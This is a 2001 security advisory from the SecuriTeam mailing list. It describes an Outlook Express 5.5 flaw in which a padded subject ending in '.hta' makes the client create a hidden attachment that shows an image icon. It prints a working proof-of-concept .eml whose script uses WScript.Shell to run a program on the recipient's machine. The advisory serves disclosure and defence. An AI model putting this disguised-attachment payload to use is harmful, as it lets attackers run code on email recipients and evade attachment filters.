Subject: [NT] HTML.dropper vulnerability allows creation of emails that contain hidden attachments
Date: Tue, 23 Jan 2001 14:38:12 +0100


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  HTML.dropper vulnerability allows creation of emails that contain hidden
attachments
------------------------------------------------------------------------

SUMMARY

Internet Explorer 5.5 and the accompanying mail and news client provide
attackers the unique ability to dictate which icons and file extensions
are required. Specifically, attackers can manufacture an email message
that appears as one thing when in fact it is not.

By carefully calculating a certain length of characters in the subject
field of an email message, Outlook Express 5.5 for whatever reason creates
an attachment incorporating the text in the body of the message. This
allows a malicious attacker to create emails that contain attachment (when
open under Outlook Express) but do not contain an attachment header (e.g.
MIME tags that indict that an attachment is present).

DETAILS

Vulnerable systems:
Internet Explorer 5.5 with Outlook Express 5.5

Exploit:
Create the following email (a file called .eml that contains the
following):
(NOTE: Spaces in the subject have been wrapped, they should be on one long
line, ending with .hta)

----
MIME-Version: 1.0
To: http-equiv@excite.com
Subject:



                                                                 .hta
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit

<!-- 17.01.2001 http://www.malware.com -->

<script>var wsh=new ActiveXObject('WScript.Shell');
wsh.Run('telnet.exe');</script>
----

The exploit will create an email message with no reference to attachments
in the headers. This can be particularly troublesome to content filtering
gateways and/or security applications that strip attachments through
header information that is content disposition: attachment; content-type:
application/malware; filename: iloveyou.vbs

What the above does is create an attachment, which in this case is an
*.hta file, but by manipulating the content-type, it is given an image
file icon. We then include in the body of our email message the very
simple code to execute whatever we wish, which is automatically
incorporated into the manufactured attachment.

Notes:
1. There is still the security warning with opening the file. However the
icon representing the content type should override, most if not all's
concern.

2. The actual file extension (*.hta in this case) seems to have to appear
in the security warning dialog, you can see it at the very end to execute.
If the subject length is too long, it creates an odd *.txt file which
calls up something like 'what do you want to open this with '.

3. This appears to be somewhat similar to something examined several
months ago:

<http://www.securiteam.com/windowsntfocus/Force_Feeding_files_to_Internet_Explorer.html> Force Feeding files to Internet Explorer

ADDITIONAL INFORMATION

The information has been provided by  <mailto:sinkhole@malware.com>
caretaker of  <http://www.malware.com> malware.

========================================


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.